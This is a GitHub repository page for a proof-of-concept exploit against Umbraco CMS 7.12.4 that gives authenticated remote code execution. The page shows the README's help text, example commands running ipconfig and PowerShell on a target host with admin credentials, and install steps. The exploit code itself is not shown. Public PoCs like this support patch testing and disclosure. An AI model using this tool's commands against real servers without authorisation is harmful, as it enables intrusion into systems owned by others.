Skip to content

noraj/Umbraco-RCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
exploit.py
exploit.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Umbraco RCE exploit / PoC

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

[EDB-49488] [PacketStorm] [WLB-2020080012]

Usage

$ python exploit.py -h usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS] Umbraco authenticated RCE optional arguments: -h, --help show this help message and exit -u USER, --user USER username / email -p PASS, --password PASS password -i URL, --host URL root URL -c CMD, --command CMD command -a ARGS, --arguments ARGS arguments

Examples:

$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig $ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Command ls'

Requirements

Example for ArchLinux:

pacman -S python-beautifulsoup4 python-requests

Example using pip:

pip3 install -r requirements.txt

Reference

This is a better re-write of EDB-ID-46153 using arguments (instead of harcoded values) and with stdout display.

Tested with python 3.8.

About

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

pwn.by/noraj/

Topics

proof-of-concept exploit umbraco poc rce umbraco-cms umbraco-v7 remote-code-execution umbraco7

Resources

Readme

License

MIT license
Activity

Stars

79 stars

Watchers

5 watching

Forks

40 forks
Report repository

Contributors

Languages